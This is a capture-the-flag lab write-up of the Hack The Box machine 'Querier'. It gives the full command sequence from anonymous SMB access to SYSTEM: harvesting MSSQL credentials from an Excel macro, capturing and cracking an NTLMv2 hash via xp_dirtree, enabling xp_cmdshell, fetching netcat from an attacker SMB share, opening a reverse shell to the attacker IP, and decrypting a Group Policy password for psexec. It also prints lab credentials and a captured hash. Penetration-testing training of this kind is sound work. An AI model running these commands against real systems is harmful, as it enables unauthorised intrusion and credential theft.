Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  • SMB
  • Mssql
  • Privilege Escalation via mssql-svc
  1. Walk-throughs
  2. WPE Capstones

Querier HTB

PreviousWPE CapstonesNextBastion HTB

Last updated 1 year ago

IP

10.10.10.125

Nmap scan

sudo nmap -sV -sC -A -oA namp_results 10.10.10.125

we have the following ports open

  • 135: RPC

  • 139: NetBIOS

  • 445: SMB

  • 1433: Mssql

Let's start with SMB enumeration

SMB

let's see if we can find any shares as an anonymous user.

smbclient -L \\\\10.10.10.125 -U "anonymous"

Looks like we have a share "report" lets mount to the drive and have a closer look

mkdir mount
sudo mount -t cifs -o username=anonymous //10.10.10.125/Reports mount

Looking through the share "report" we do see a document, lets copy it onto our machine

When we try to open the document through LibreOffice we are warned that the file contains macros.

What we can do is press okay and continue to open the xlsm file within LibreOffice go to Tools → Macros → Edit Macros.

we should be bought to the following page.

we can see we have a set of Mssql credentials.

QUERIER reporting PcwTWTHRwryjc$c6

  • Quick tip xlsm, xlsx, docx are just zip archives, therefore we can decompress them.

Mssql

Since we have a set of Msql credentials, let's try and connect to the server.

impacket-mssqlclient -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125

  • reporting doesn’t have required privs/permissions to establish a ‘xp_cmdshell’

We can most likely capture some credentials

We can use impacket to capture the NTLMv2-SSP hash, first lets setup our smb server

impacket-smbserver -smb2support creds /Impacket

then from our Mssql client we can use xp_dirtree to try and retrieve a file from our impacket smb server

xp_dirtree "\\10.10.16.4\creds",1, 1

Once there is a connection established, we can see we captured the NTLMv2-SSP hash

mssql-svc::QUERIER:4aae94a03c8616b0:4F3EE1AE2B23F5A6A467497B7DA0039E:010100000000000080675ABE3AC1D9017856BA80532BD0C6000000000200080042004F004A004E0001001E00570049004E002D004300460045003100550037005300490030003600340004003400570049004E002D00430046004500310055003700530049003000360034002E0042004F004A004E002E004C004F00430041004C000300140042004F004A004E002E004C004F00430041004C000500140042004F004A004E002E004C004F00430041004C000700080080675ABE3AC1D90106000400020000000800300030000000000000000000000000300000AF74B77FF1809498BBCF978D656F9AAFFB86F5F579FA36A93741735315EF3CD00A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003400000000000000000000000000

Let's use Hashcat to crack the hash

first, we need to find the hash mode for Hashcat

hashcat -h | grep NTLMv2

Now lets crack it

hashcat -m 5600 -a 0 mssql_hash.txt /usr/share/wordlists/rockyou.txt
corporate568

Now that we have Mssql password let's attempt an xp_cmdshell first let's use impacket-mssqlclient and test our credentials

impacket-mssqlclient -windows-auth querier/mssql-svc:corporate568@10.10.10.125

we need to enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE

Our next goal is to establish a reverse shell on the target machine we need to

  1. Download nc64.exe onto the system

  2. Run nc64.exe to connect back to our netcat listener

Move nc64.exe into your working directory.

Now we can set up a smb server to grab our nc64.exe.

impacket-smbserver -smb2support grab ./

Now from our xp_cmdshell

xp_cmdshell esentutl.exe /y \\10.10.16.4\grab\nc64.exe /d C:\Users\mssql-svc\nc64.exe /o

Now we have nc64.exe on our target machine we can start our netcat listener.

nc -lvnp 9005

From our xp_cmdshell lets run nc64.exe and connect to our listener.

xp_cmdshell C:\Users\mssql-svc\nc64.exe -e cmd 10.10.16.4 9005

we now have a reverse shell on the system.

Privilege Escalation via mssql-svc

First Lets get some system information and run it through wes-ng

systeminfo
systeminfo

Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA073
Original Install Date:     1/28/2019, 11:16:50 PM
System Boot Time:          7/28/2023, 1:29:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,803 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 4,060 MB
Virtual Memory: In Use:    1,443 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB.LOCAL
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4481031
                           [02]: KB4470788
                           [03]: KB4480056
                           [04]: KB4480979
                           [05]: KB4476976
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.125
                                 [02]: fe80::a84c:d63a:3dcd:5749
                                 [03]: dead:beef::a84c:d63a:3dcd:5749
                                 [04]: dead:beef::150
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Copy and paste the output to our local machine and run it through wes-ng

/opt/wesng/wes.py --update
/opt/wesng/wes.py systeminfo.txt

  • no luck

C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>

we can find a file "Groups.xml" if we look at the file.

  • we find a encrypted password, we can use gpp-decrypt to decrypt the password

gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ

We get the password

MyUnclesAreMarioAndLuigi!!1!

From here we can use impacket-psexec to get a shell on the system as the Administrator

impacket-psexec QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

We now have a shell as nt authority\system

if we refer to specifically cached GPP(Group Policy Preferences) Password, within the

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation